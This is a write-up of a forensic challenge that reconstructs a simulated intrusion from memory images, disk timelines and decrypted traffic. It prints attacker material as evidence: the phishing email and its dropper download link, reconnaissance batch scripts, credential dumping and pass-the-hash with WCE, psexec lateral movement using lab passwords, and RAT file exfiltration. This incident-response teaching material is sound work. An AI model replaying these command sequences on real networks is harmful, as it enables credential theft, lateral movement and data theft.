ulilclown@gmail.com/@alwaysreit
infoseckitten@gmail.com/@infoseckitten
hack3rsaurus@gmail.com/@magicked
First, thanks to @jackcr for this amazing challenge. Aspiring forensic analysts should take note of the real world scenario. You can download the challenge here: https://t.co/Rfx8Iw7j
This forensic challenge consisted of 4 hosts. First we will post the basic information on each host before diving into the documentation. Note: There is a TON of data in this writeup, we tried to make it as readable as possible.
Note: Some artifacts that were discovered in memory were tried to match up with their input in the fileslisting. The issue is that you never know exactly what command was run at a specific time. (IE, net.exe is thrown into prefetch, but not sure if it was a net use, net view, net share command, etc...).
Challenge Questions
Like our other write-up for @jackcr’s first forensic challenge, we will start with the answers to the questions.1. Who delivered the attack?
From: "Security Department" <isd@petro-markets.info>
2. Who was the attack delivered too?
<amirs@petro-market.org>, <callb@petro-market.org>, <wrightd@petro-market.org>
3. What time was the attack delivered?
26 Nov 2012 14:59:38
4. What time was the attack executed?
2012-11-26 23:01:54
5. What is the C2 ip Address?
58.64.132.141
6. What is the name of the dropper?
Symantec-1.43-1.exe
7. What is the name of the backdoor?
c:/WINDOWS/system32/6to4ex.dll
8. What is the process name the backdoor is running in?
svchost.exe (6to4ex.dll)
9. What is the process id on all the machines the backdoor is installed on?
1024
10. What usernames were used in this attack?
petro1-market\callb , sysbackup
11. What level of access did the attacker have?Admins (sysbackup)
12. How was lateral movement performed?
Through psexec (ps.exe)
13. What .bat scripts were placed on the machines?
system[1-6].bat
14. What are the contents of each .bat script?
system1.bat
@echo off
mkdir c:\windows\webui
net share z=c:\windows\webui /GRANT:sysbackup,FULL
ipconfig /all >> c:\windows\webui\system.dll
net share >> c:\windows\webui\system.dll
net start >> c:\windows\webui\system.dll
net view >> c:\windows\webui\system.dll
system2.bat
@echo off
c:\windows\webui\gs.exe -a >> c:\windows\webui\svchost.dll
system3.bat
@echo off
dir /S C:\*.dwg > c:\windows\webui\https.dll
system4.bat
@echo off
c:\windows\webui\ra.exe a -hphclllsddlsdiddklljh -r c:\windows\webui\netstat.dll
"C:\Engineering\Designs\Pumps" -x*.dll
system5.bat
@echo off
copy c:\windows\webui\wc.exe c:\windows\system32
at 19:30 wc.exe -e -o h.out
system6.bat
@echo off
ipconfig /all >> c:\windows\webui\system.dll
net share >> c:\windows\webui\system.dll
net start >> c:\windows\webui\system.dll
net view >> c:\windows\webui\system.dll
15. What other tools were placed on the machines by the attacker?
Windows Credential Editor/Extractor = WCE
PSexec
16. What directory was used by the attacker to drop tools?
C:\windows\webui\
17. Was the directory newly created or was it there prior to the attack?
Created during the attack
From the PCAP:
mkdir webui
mkdir webui
C:\WINDOWS>
cd webui
cd webui
C:\WINDOWS\webui>
18. What were the names of the exfiltrated files?
netuse.dll,system.dll, netstat.dll, https.dll, svchost.dll
19. What did the exfiltrated files contain?
netstat.dll (from IIS-SARIYADH-03):
rar containing pump[1-100].dwg (these files contain nothing, just zeroes)
netuse.dll (from ENG-USTXHOU-148):
net view
net localgroup administrators
net sessions
sl.exe -bht 445,80.443.21.1433 172.16.150.1-254
net share
net start
system.dll (from ENG-USTXHOU-148):
ipconfig /all
net share
net start
net view
https.dll (from ENG-USTXHOU-148):
dir /S C:\*.dwg
svchost.dll (from ENG-USTXHOU-148):
c:\windows\webui\gs.exe -a
20. What time did winrar run?
Nov 27 2012 01:11:19
21. What is the md5sum of pump1.dwg?
a48266248c04b2ba733238a480690a1c
22. Which machines were compromised and need to be remediated?
- ENG-USTXHOU-148
- FLD-SARIYADH-43
- IIS-SARIYADH-03
23. Which user accounts were compromised and need to be remediated?
- callib
- amirs, Note: this system was compromised, but the credentials may not have been dumped.
- sysbackup
- all dumped hashes from svchost.dll
24. Are there additional machines that need to be analyzed?
No
25. Describe how each machine was involved in this incident and overall what happened.
See below.
Basic System Info
To get the ip and host information it was just a combination of 2 volatility commands against the memdump
$vol.py -f memdump.bin imageinfo
and then take the profile and use that to find active connections
$vol.py -f memdump.bin connections --profile=WinXPSP2x86
ENG-USTXHOU-148 = 172.16.150.20
Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
AS Layer1 : JKIA32PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (/ENG-USTXHOU-148/memdump.bin)
PAE type : No PAE
DTB : 0x39000L
KDBG : 0x8054cde0
Number of Processors : 1
Image Type (Service Pack) : 3
KPCR for CPU 0 : 0xffdff000
KUSER_SHARED_DATA : 0xffdf0000
Image date and time : 2012-11-27 01:57:28 UTC+0000
Image local date and time : 2012-11-26 19:57:28 -0600
FLD-SARIYADH-43 = 172.16.223.187
Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
AS Layer1 : JKIA32PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (/FLD-SARIYADH-43/memdump.bin)
PAE type : No PAE
DTB : 0x39000L
KDBG : 0x8054cde0
Number of Processors : 1
Image Type (Service Pack) : 3
KPCR for CPU 0 : 0xffdff000
KUSER_SHARED_DATA : 0xffdf0000
Image date and time : 2012-11-27 01:46:00 UTC+0000
Image local date and time : 2012-11-27 04:46:00 +0300
IIS-SARIYADH-03 = 172.16.223.47
Suggested Profile(s) : Win2003SP0x86, Win2003SP1x86, Win2003SP2x86 (Instantiated with Win2003SP0x86)
AS Layer1 : JKIA32PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (/IIS-SARIYADH-03/memdump.bin)
PAE type : No PAE
DTB : 0x39000L
KDBG : 0x805583d0
Number of Processors : 1
Image Type (Service Pack) : 0
KPCR for CPU 0 : 0xffdff000
KUSER_SHARED_DATA : 0xffdf0000
Image date and time : 2012-11-27 01:52:37 UTC+0000
Image local date and time : 2012-11-27 04:52:37 +0300
DC-USTXHOU = 172.16.150.10
Suggested Profile(s) : Win2003SP0x86, Win2003SP1x86, Win2003SP2x86 (Instantiated with Win2003SP0x86)
AS Layer1 : JKIA32PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (/DC-USTXHOU/memdump.bin)
PAE type : No PAE
DTB : 0x39000L
KDBG : 0x805583d0
Number of Processors : 1
Image Type (Service Pack) : 0
KPCR for CPU 0 : 0xffdff000
KUSER_SHARED_DATA : 0xffdf0000
Image date and time : 2012-11-27 02:01:57 UTC+0000
Image local date and time : 2012-11-26 20:01:57 -0600Initial Vector - Phish
The initial vector is seen in memory below
Relevant information is highlighted.
Received: from d0793h (d0793h.petro-markets.info [58.64.132.141])
by ubuntu-router (8.14.3/8.14.3/Debian-9.2ubuntu1) with SMTP id qAQK06Co005842;
Mon, 26 Nov 2012 15:00:07 -0500
Message-ID:
From: "Security Department"
To: , ,
Subject: Immediate Action
-Date: Mon, 26 Nov 2012 14:59:38 -0500
-MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_0015_01CDCBE6.A7B92DE0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.5512
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5512
Return-Path: isd@petro-markets.info
X-OriginalArrivalTime: 26 Nov 2012 20:00:08.0432 (UTC) FILETIME=[A2ABBF00:01CDCC10]
-This is a multi-part message in MIME format.
-------=_NextPart_000_0015_01CDCBE6.A7B92DE0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Attn: Immediate Action is Required!!
The IS department is requiring that all associates update to the new =
version of anti-virus. This is critical and must be done ASAP! Failure =
to update anti-virus may result in negative actions.
Please download the new anti-virus and follow the instructions. Failure =
to install this anti-virus may result in loosing your job!
Please donwload at http://58.64.132.8/download/Symantec-1.43-1.exe
Regards,
The IS Department
Users Download Phishes
ENG-USTXHOU-148 - User callib downloads (saved on the drive as Symantec-1.43-1[1].exe:
FLD-SARIYADH-43 - User amirs downloads (saved on the drive as Symantec-1.43-1[2].exe)
Visited: callb@http://58.64.132.8/download/Symantec-1.43-1.exe
http://58.64.132.8/download/Symantec-1.43-1.exe
Symantec-1.43-1[1].exe
HTTP/1.1 200 OK
ETag: "21628-1b667-4cf2b68a20f60"
Content-Length: 112231
Keep-Alive: timeout=15, max=100
Content-Type: application/x-msdos-program
~U:callbFLD-SARIYADH-43 - User amirs downloads (saved on the drive as Symantec-1.43-1[2].exe)
HTTP/1.1 200 OKETag: "21628-1b667-4cf2b68a20f60"
Content-Length: 112231
Keep-Alive: timeout=15, max=100
Content-Type: application/x-msdos-program
~U:amirs
URL http://58.64.132.8/download/Symantec-1.43-1.exe
Symantec-1.43-1[2].exe
HTTP/1.1 200 OK
ETag: "21628-1b667-4cf2b68a20f60"
Content-Length: 112231
Keep-Alive: timeout=15, max=100
Content-Type: application/x-msdos-programPwnage Begins
2012-11-26 23:01:54 - ENG-USTXHOU-148 - SYMANTEC-1.43-1[2].EXE-3793B625.pf is executed and and 6to4ex.dll is created
Mon Nov 26 2012 23:01:54
22428 macb r/rrwxrwxrwx 0 0
11722-128-4 c:/WINDOWS/Prefetch/SYMANTEC-1.43-1[2].EXE-3793B625.pf
...snip...
100895 .ac. r/rr-xr-xr-x 0 0 8610-128-4 c:/WINDOWS/system32/6to4ex.dll
Using volatility you can see that 6to4ex.dll is running under PID 1024
$vol.py -f memdump.bin dlllist -p 1024
Volatile Systems Volatility Framework 2.2
************************************************************************
svchost.exe pid: 1024
Command line : C:\WINDOWS\System32\svchost.exe -k netsvcs
Service Pack 3
..snip....
0x72ae0000 0x13000 C:\WINDOWS\System32\RASQEC.DLL
0x768d0000 0xa4000 C:\WINDOWS\System32\RASDLG.dll
0x77b40000 0x22000 C:\WINDOWS\system32\Apphelp.dll
0x50640000 0xc000 C:\WINDOWS\system32\wups.dll
0x5f740000 0xe000 C:\WINDOWS\System32\wbem\ncprov.dll
0x10000000 0x1c000 c:\windows\system32\6to4ex.dll
0x73b80000 0x12000 c:\windows\system32\AVICAP32.dll
More work could be done to extract this binary and dig through it, however much of this will be covered in a later section of the writeup.
2012-11-26 23:03:10 - ENG-USTXHOU-148 - webui directory is born
Mon Nov 26 2012 23:03:10 56 ...b d/drwxrwxrwx 0 0 7556-144-5 c:/WINDOWS/webui
Decrypted PCAP - webui directory is born and entered
C:\WINDOWS\system32>
cd ..
cd ..
C:\WINDOWS>
mkdir webui
mkdir webui
C:\WINDOWS>
cd webui
cd webui
C:\WINDOWS\webui>
2012-11-26 23:03:21 - ENG-USTXHOU-148 - ipconfig is being run
Mon Nov 26 2012 23:03:21 26602 ...b r/rrwxrwxrwx 0 0 11706-128-4 c:/WINDOWS/Prefetch/IPCONFIG.EXE-2395F30B.pf
55808 .a.. r/rrwxrwxrwx 0 0 24145-128-3 c:/WINDOWS/system32/ipconfig.exe
Decrypted PCAP - ipconfig being run and information echo’d back
C:\WINDOWS\webui>
ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 172.16.150.20
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.150.2
C:\WINDOWS\webui>
2012-11-26 23:06:34 - ENG-USTXHOU-148 - ps.exe, gs.exe, ra.exe, sl.exe and wc.exe are all dropped on the system
Mon Nov 26 2012 23:06:34 381816 ...b r/rrwxrwxrwx 0 0 11710-128-3 c:/WINDOWS/ps.exe
56 m.c. d/drwxrwxrwx 0 0 28-144-6 c:/WINDOWS
Mon Nov 26 2012 23:06:35 381816 m.c. r/rrwxrwxrwx 0 0 11710-128-3 c:/WINDOWS/ps.exe
Mon Nov 26 2012 23:06:47 303104 ...b r/rrwxrwxrwx 0 0 11719-128-3 c:/WINDOWS/webui/gs.exe
Mon Nov 26 2012 23:06:48 303104 mac. r/rrwxrwxrwx 0 0 11719-128-3 c:/WINDOWS/webui/gs.exe
Mon Nov 26 2012 23:06:52 403968 macb r/rrwxrwxrwx 0 0 11723-128-3 c:/WINDOWS/webui/ra.exe
Mon Nov 26 2012 23:06:56 20480 macb r/rrwxrwxrwx 0 0 11724-128-3 c:/WINDOWS/webui/sl.exe
Mon Nov 26 2012 23:06:59 208384 m.cb r/rrwxrwxrwx 0 0 11725-128-3 c:/WINDOWS/webui/wc.exe
208384 m... r/rrwxrwxrwx 0 0 11739-128-3 c:/WINDOWS/system32/wc.exe
ENG-USTXHOU-148 - Attacker runs the dir command, remember the output from this dir command to compare to other examples you might find in memory.
908460- Volume in drive C has no label.
908461- Volume Serial Number is 1044-534A
908462- Directory of C:\WINDOWS\webui
908463-11/26/2012 05:07 PM <DIR> .
908464-11/26/2012 05:07 PM <DIR> ..
908465-11/26/2012 05:06 PM 303,104 gs.exe
908466-11/26/2012 05:11 PM 11,844 netuse.dll
908467-11/26/2012 05:06 PM 403,968 ra.exe
908468:11/26/2012 05:06 PM 20,480 sl.exe
908469-11/26/2012 05:06 PM 208,384 wc.exe
908470- 5 File(s) 947,780 bytes
908471- 2 Dir(s) 7,005,007,872 bytes free
908472-C:\WINDOWS\webui>
2012-11-26 23:07:53 - ENG-USTXHOU-148 - Net is thrown into prefetch (some work will be needed to try and match that up with a memory net command
Mon Nov 26 2012 23:07:53 14394 ...b r/rrwxrwxrwx 0 0 11727-128-4 c:/WINDOWS/Prefetch/NET.EXE-01A53C2F.pf
Decrypted PCAP - net commands are being used and the results are fed into netuse.dll
C:\WINDOWS\webui>
net view >> netuse.dll
net view >> netuse.dll
C:\WINDOWS\webui>
net localgroup administrators >> netuse.dll
net localgroup administrators >> netuse.dll
C:\WINDOWS\webui>
net sessions >> netuse.dll
net sessions >> netuse.dll
C:\WINDOWS\webui>
net share >> netuse.dll
net share >> netuse.dll
C:\WINDOWS\webui>
net start >> netuse.dll
net start >> netuse.dll
2012-11-26 23:10:35 - ENG-USTXHOU-148 - SL.EXE is thrown into prefetch
Mon Nov 26 2012 23:10:35 6768 ...b r/rrwxrwxrwx 0 0 11729-128-4 c:/WINDOWS/Prefetch/SL.EXE-010E2A23.pf
Decrypted PCAP - sl (ScanLine) is being used to find open 445 (Windows), 80 (Web), 443 (HTTPS), 21 (FTP) and (1433) SQL hosts on 172.16.150.0/24
C:\WINDOWS\webui>
sl.exe -bht 445,80.443.21.1433 172.16.150.1-254 >> netuse.dll
sl.exe -bht 445,80.443.21.1433 172.16.150.1-254 >> netuse.dll
ScanLine (TM) 1.01
Copyright (c) Foundstone, Inc. 2002
http://www.foundstone.com
5 IPs and 25 ports scanned in 0 hours 0 mins 13.11 secs
2012-11-26 23:11:33 - ENG-USTXHOU-148 - SL.EXE is thrown into prefetch again
Mon Nov 26 2012 23:11:33 6768 mac. r/rrwxrwxrwx 0 0 11729-128-4 c:/WINDOWS/Prefetch/SL.EXE-010E2A23.pf
Decrypted PCAP - sl (ScanLine) is being used to find open 445 (Windows), 80 (Web), 443 (HTTPS), 21 (FTP) and (1433) SQL hosts on 172.16.150.0/24 again and the results are dumped into netuse.dll
C:\WINDOWS\webui>
sl.exe -bht 445,80,443,21,1433 172.16.150.1-254 >> netuse.dll
sl.exe -bht 445,80,443,21,1433 172.16.150.1-254 >> netuse.dll
ScanLine (TM) 1.01
Copyright (c) Foundstone, Inc. 2002
http://www.foundstone.com
5 IPs and 25 ports scanned in 0 hours 0 mins 13.08 secs
2012-11-26 23:11:58 - ENG-USTXHOU-148 - GS.EXE is thrown into prefetch and netuse.dll is created.
Mon Nov 26 2012 23:11:58 11844 mac. r/rrwxrwxrwx 0 0 11726-128-3 c:/WINDOWS/webui/netuse.dll
10002 macb r/rrwxrwxrwx 0 0 11730-128-4 c:/WINDOWS/Prefetch/GS.EXE-3796DDD9.pf
415744 .a.. r/rrwxrwxrwx 0 0 23392-128-3 c:/WINDOWS/system32/samsrv.dll
33280 .a.. r/rrwxrwxrwx 0 0 24343-128-3 c:/WINDOWS/system32/cryptdll.dll
Decrypted PCAP - gs -a is run and results are stored in netuse.dll
C:\WINDOWS\webui>
gs -a >> netuse.dll
gs -a >> netuse.dll
0043B820
ENG-USTXHOU-148 - The attacker runs a “dir” command
Volume in drive C has no label.
Volume Serial Number is 1044-534A
Directory of C:\WINDOWS\webui
11/26/2012 07:01 PM <DIR> .
11/26/2012 07:01 PM <DIR> ..
11/26/2012 05:06 PM 303,104 gs.exe
11/26/2012 07:00 PM 5,282 https.dll
11/26/2012 05:11 PM 11,844 netuse.dll
11/26/2012 05:06 PM 403,968 ra.exe
11/26/2012 05:06 PM 20,480 sl.exe
11/26/2012 06:56 PM 1,230 svchost.dll
11/26/2012 06:44 PM 5,711 system.dll
11/26/2012 05:06 PM 208,384 wc.exe
8 File(s) 960,003 bytes
2 Dir(s) 7,004,917,760 bytes free
C:\WINDOWS\webui>
Decrypted PCAP - Several dir commands are run and netuse.dll is exfilled.
C:\WINDOWS\webui>
COMMAND: LIST DRIVE
TOKEN: DRIVE LIST
DRIVE TOTAL FREE FILESYSTEM DESCRIPTION
A 0 0 Removable Disk
C 10228 6680 NTFS Local Disk
D 539 0 CDFS CD Drive
COMMAND: LIST FILES (C:\)
...snip...
COMMAND: LIST FILES (C:\WINDOWS\)
...snip...
COMMAND: LIST FILES (C:\WINDOWS\webui\)
...snip...
COMMAND: DOWN FILES (C:\WINDOWS\webui\netuse.dll)
TOKEN: FILE SIZE (C:\WINDOWS\webui\netuse.dll: 11844)
COMMAND: CONTINUE
TOKEN: FILE DATA (8183)
COMMAND: CONTINUE
TOKEN: FILE DATA (3661)
COMMAND: CONTINUE
TOKEN: TRANSFER FINISH
2012-11-26 23:16:14 - ENG-USTXHOU-148 - Ping is thrown in prefetch
Mon Nov 26 2012 23:15:44 13296 ...b r/rrwxrwxrwx 0 0 11731-128-4 c:/WINDOWS/Prefetch/PING.EXE-31216D26.pf
Mon Nov 26 2012 23:16:14 13296 mac. r/rrwxrwxrwx 0 0 11731-128-4 c:/WINDOWS/Prefetch/PING.EXE-31216D26.pf
Decrypted PCAP - Pings are made out to DC-USTXHOU and IIS-SARIYADH-03 and a dir command is also run
ping DC-USTXHOU
ping DC-USTXHOU
Pinging dc-ustxhou.petro-market.org [172.16.150.10] with 32 bytes of data:
Reply from 172.16.150.10: bytes=32 time<1ms TTL=128
Reply from 172.16.150.10: bytes=32 time<1ms TTL=128
Reply from 172.16.150.10: bytes=32 time<1ms TTL=128
Reply from 172.16.150.10: bytes=32 time<1ms TTL=128
Ping statistics for 172.16.150.10:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
C:\WINDOWS\webui>
ping IIS-SARIYADH-03
ping IIS-SARIYADH-03
Pinging IIS-SARIYADH-03.petro-market.org [172.16.223.47] with 32 bytes of data:
Reply from 172.16.223.47: bytes=32 time=2ms TTL=127
Reply from 172.16.223.47: bytes=32 time=1ms TTL=127
Reply from 172.16.223.47: bytes=32 time=1ms TTL=127
Reply from 172.16.223.47: bytes=32 time<1ms TTL=127
Ping statistics for 172.16.223.47:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 2ms, Average = 1ms
C:\WINDOWS\webui>
dir
dir
Volume in drive C has no label.
Volume Serial Number is 1044-534A
Directory of C:\WINDOWS\webui
11/26/2012 05:07 PM <DIR> .
11/26/2012 05:07 PM <DIR> ..
11/26/2012 05:06 PM 303,104 gs.exe
11/26/2012 05:11 PM 11,844 netuse.dll
11/26/2012 05:06 PM 403,968 ra.exe
11/26/2012 05:06 PM 20,480 sl.exe
11/26/2012 05:06 PM 208,384 wc.exe
5 File(s) 947,780 bytes
2 Dir(s) 7,005,007,872 bytes free
C:\WINDOWS\webui>
2012-11-26 23:58:51 - ENG-USTXHOU-148 - WC.EXE is thrown into prefetch
Mon Nov 26 2012 23:58:51 13208 ...b r/rrwxrwxrwx 0 0 11732-128-4 c:/WINDOWS/Prefetch/WC.EXE-21AD5E60.pf
Decrypted PCAP - wc.exe -l is used and wc.exe -w
C:\WINDOWS\webui>
wc.exe -l
wc.exe -l
WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
callb:PETRO-MARKET:115B24322C11908C85140F5D33B6232F:40D1D232D5F731EA966913EA458A16E7
ENG-USTXHOU-148$:PETRO-MARKET:00000000000000000000000000000000:D6717F1E5252FA87ED40AF8C46D8B1E2
C:\WINDOWS\webui>
wc.exe -w
wc.exe -w
WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
callb\PETRO-MARKET:Mar1ners@4655
NETWORK
SERVICE\PETRO-MARKET:+A;dhzj%o<8xpD@,p5v)C:p2%?1Nkx&5OU!c[wt5BgV'r4p7/lWc[`XWPpN/.d$I.Ubc-7c
$-ap(@?I7S6SD(U-zbdQHgT2& u\rgk(ga?y+GGE*E_0/2Qs
ENG-USTXHOU-148$\PETRO-MARKET:+A;dhzj%o<8xpD@,p5v)C:p2%?1Nkx&5OU!c[wt5BgV'r4p7/lWc[`XWPpN/.d$I.Ubc-7c
$-ap(@?I7S6SD(U-zbdQHgT2& u\rgk(ga?y+GGE*E_0/2Qs
2012-11-27 00:00:57 - ENG-USTXHOU-148 - PS.EXE is thrown into prefetch
Tue Nov 27 2012 00:00:57 12542 ...b r/rrwxrwxrwx 0 0 11733-128-4 c:/WINDOWS/Prefetch/PS.EXE-09745CC1.pf
Decrypted PCAP - psexec is used with the callb credentials (using the cleartext password)
C:\WINDOWS\webui>
ps.exe \\172.16.150.10 -u petro1-market\callb -p Mar1ners@4655 -accepteula cmd /c ipconfig
ps.exe \\172.16.150.10 -u petro1-market\callb -p Mar1ners@4655 -accepteula cmd /c ipconfig
PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
The handle is invalid.
Connecting to 172.16.150.10... Couldn't access 172.16.150.10:
Connecting to 172.16.150.10..
2012-11-27 00:05:48 - IIS-SARIYADH-03 - psexec born on the system
Tue Nov 27 2012 00:05:48 181064 macb r/rrwxrwxrwx 0 0 10784-128-3 c:/WINDOWS/PSEXESVC.EXE
2012-11-27 00:07:03 - ENG-USTXHOU-148 - ps is accessed
Tue Nov 27 2012 00:07:03 381816 .a.. r/rrwxrwxrwx 0 0 11710-128-3 c:/WINDOWS/ps.exe
Decrypted PCAP - psexec is used with the callb credentials (using the cleartext password)
C:\WINDOWS\webui>
ps \\172.16.223.47 -u petro1-market\callb -p Mar1ners@4655 -accepteula cmd /c ipconfig
ps \\172.16.223.47 -u petro1-market\callb -p Mar1ners@4655 -accepteula cmd /c ipconfig
PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
The handle is invalid.
Connecting to 172.16.223.47... Couldn't access 172.16.223.47:
Connecting to 172.16.223.47...
2012-11-27 00:10:44 - ENG-USTXHOU-148 - wc.exe is also in prefetch
Tue Nov 27 2012 00:10:44 13208 mac. r/rrwxrwxrwx 0 0 11732-128-4 c:/WINDOWS/Prefetch/WC.EXE-21AD5E60.pf
Decrypted PCAP - wc.exe is used to change credentials to the sysbackup user, given the other failures with psexec (trying to run ipconfig) on another host, the attacker is trying to escalate priv’s to see if this will work
C:\WINDOWS\webui>
wc.exe -s sysbackup:current:c2a3915df2ec79ee73108eb48073acb7:e7a6f270f1ba562a90e2c133a95d2057
wc.exe -s sysbackup:current:c2a3915df2ec79ee73108eb48073acb7:e7a6f270f1ba562a90e2c133a95d2057
WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
Changing NTLM credentials of current logon session (000003E7h) to:
Username: sysbackup
domain: current
LMHash: c2a3915df2ec79ee73108eb48073acb7
NTHash: e7a6f270f1ba562a90e2c133a95d2057
NTLM credentials successfully changed!
2012-11-27 00:13:59 - ENG-USTXHOU-148 - ps is in prefetch
Tue Nov 27 2012 00:13:59 12542 mac. r/rrwxrwxrwx 0 0 11733-128-4 c:/WINDOWS/Prefetch/PS.EXE-09745CC1.pf
Decrypted PCAP - now trying psexec as sysbackup, this can also be found in memory as listed below
C:\WINDOWS\webui>
ps.exe \\172.16.150.10 -u sysbackup -p T1g3rsL10n5 -accpeteula cmd /c ipconfig
ps.exe \\172.16.150.10 -u sysbackup -p T1g3rsL10n5 -accpeteula cmd /c ipconfig
PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
The handle is invalid.
Connecting to 172.16.150.10... Couldn't access 172.16.150.10:
Connecting to 172.16.150.10...
ENG-USTXHOU-148 (IN MEMORY) - ps command, running ipconfig on 172.16.223.47
ps.exe \\172.16.223.47 -u sysbackup -p T1g3rsL10n5 -accpeteula cmd /c ipconfig
2012-11-27 00:17:58 - FLD-SARIYADH-43 - 6to4ex.dll shows up on the filesystem, along with SYMANTEC-1.43-1[2] being in prefetch
Tue Nov 27 2012 00:17:58 100895 .ac. r/rr-xr-xr-x 0 0 12010-128-4 c:/WINDOWS/system32/6to4ex.dll
22270 macb r/rrwxrwxrwx 0 0 12011-128-4 c:/WINDOWS/Prefetch/SYMANTEC-1.43-1[2].EXE-330FB7E3.pf
2012-11-27 00:17:58 - FLD-SARIYADH-43 - webui directory is born
Tue Nov 27 2012 00:18:31 56 ...b d/drwxrwxrwx 0 0 7555-144-5 c:/WINDOWS/webui
2012-11-27 00:20:06 - FLD-SARIYADH-43 - ps is created on disk
Tue Nov 27 2012 00:20:06 381816 macb r/rrwxrwxrwx 0 0 12000-128-3 c:/WINDOWS/ps.exe
2012-11-27 00:20:33 - FLD-SARIYADH-43 - gs.exe is created on disk
Tue Nov 27 2012 00:20:33 303104 macb r/rrwxrwxrwx 0 0 12005-128-3 c:/WINDOWS/webui/gs.exe
2012-11-27 00:20:33 - IIS-SARIYADH-03 - gs.exe is modified (gsecdump as recovered from pcap)
Tue Nov 27 2012 00:20:33 303104 m... r/rrwxrwxrwx 0 0 10365-128-3 c:/WINDOWS/webui/gs.exe
2012-11-27 00:20:36 - FLD-SARIYADH-43 - ps is in the webui directory
Tue Nov 27 2012 00:20:36 381816 ...b r/rrwxrwxrwx 0 0 12012-128-3 c:/WINDOWS/webui/ps.exe
2012-11-27 00:20:37 - FLD-SARIYADH-43 - formal creation timestamp is placed
Tue Nov 27 2012 00:20:37 381816 m.c. r/rrwxrwxrwx 0 0 12012-128-3 c:/WINDOWS/webui/ps.exe
2012-11-27 00:20:39 - FLD-SARIYADH-43 - ra.exe is in the webui directory
Tue Nov 27 2012 00:20:39 403968 ...b r/rrwxrwxrwx 0 0 12013-128-3 c:/WINDOWS/webui/ra.exe
2012-11-27 00:20:40 - FLD-SARIYADH-43 - ra.exe gets it’s creation timestamp
Tue Nov 27 2012 00:20:40 403968 mac. r/rrwxrwxrwx 0 0 12013-128-3 c:/WINDOWS/webui/ra.exe
2012-11-27 00:20:40 - IIS-SARIYADH-03 - ra.exe is modified (rar.exe)
Tue Nov 27 2012 00:20:40 403968 m... r/rrwxrwxrwx 0 0 10380-128-3 c:/WINDOWS/webui/ra.exe
2012-11-27 00:20:42 - FLD-SARIYADH-43 - sl.exe is written to disk
Tue Nov 27 2012 00:20:42 20480 macb r/rrwxrwxrwx 0 0 12014-128-3 c:/WINDOWS/webui/sl.exe
2012-11-27 00:20:46 - FLD-SARIYADH-43 - wc.exe is created
Tue Nov 27 2012 00:20:46 208384 m.cb r/rrwxrwxrwx 0 0 12015-128-3 c:/WINDOWS/webui/wc.exe
208384 m... r/rrwxrwxrwx 0 0 12031-128-3 c:/WINDOWS/system32/wc.exe
2012-11-27 00:20:46 - IIS-SARIYADH-03 -wc.exe is modified (wce)
Tue Nov 27 2012 00:20:46 208384 m... r/rrwxrwxrwx 0 0 10881-128-3 c:/WINDOWS/webui/wc.exe
2012-11-27 00:21:12 - FLD-SARIYADH-43 - netuse.dll is born and ipconfig is used
Tue Nov 27 2012 00:21:12 10454 ...b r/rrwxrwxrwx 0 0 12016-128-3 c:/WINDOWS/webui/netuse.dll
55808 .a.. r/rrwxrwxrwx 0 0 24195-128-3 c:/WINDOWS/system32/ipconfig.exe
2012-11-27 00:21:13 - FLD-SARIYADH-43 - prefetch grabs ipconfig
Tue Nov 27 2012 00:21:13 26332 macb r/rrwxrwxrwx 0 0 12017-128-4 c:/WINDOWS/Prefetch/IPCONFIG.EXE-2395F30B.pf
FLD-SARIYADH-43 - ipconfig being run and echo’d back to the console
1727908-Windows IP Configuration
1727909- Host Name . . . . . . . . . . . . : fld-sariyadh-43
1727910- Primary Dns Suffix . . . . . . . : petro-market.org
1727911- Node Type . . . . . . . . . . . . : Hybrid
1727912- IP Routing Enabled. . . . . . . . : No
1727913- WINS Proxy Enabled. . . . . . . . : No
1727914- DNS Suffix Search List. . . . . . : petro-market.org
1727915-Ethernet adapter Local Area Connection:
1727916- Connection-specific DNS Suffix . :
1727917- Description . . . . . . . . . . . : AMD PCNET Family PCI Ethernet Adapter
1727918- Physical Address. . . . . . . . . : 00-0C-29-A7-7C-6E
1727919- Dhcp Enabled. . . . . . . . . . . : No
1727920- IP Address. . . . . . . . . . . . : 172.16.223.187
1727921- Subnet Mask . . . . . . . . . . . : 255.255.255.0
1727922- Default Gateway . . . . . . . . . : 172.16.223.8
1727923- DNS Servers . . . . . . . . . . . : 172.16.150.10
1727924- Primary WINS Server . . . . . . . : 172.16.223.47
2012-11-27 00:21:26 - FLD-SARIYADH-43 - net is used
Tue Nov 27 2012 00:21:26 14550 ...b r/rrwxrwxrwx 0 0 12018-128-4 c:/WINDOWS/Prefetch/NET.EXE-01A53C2F.pf
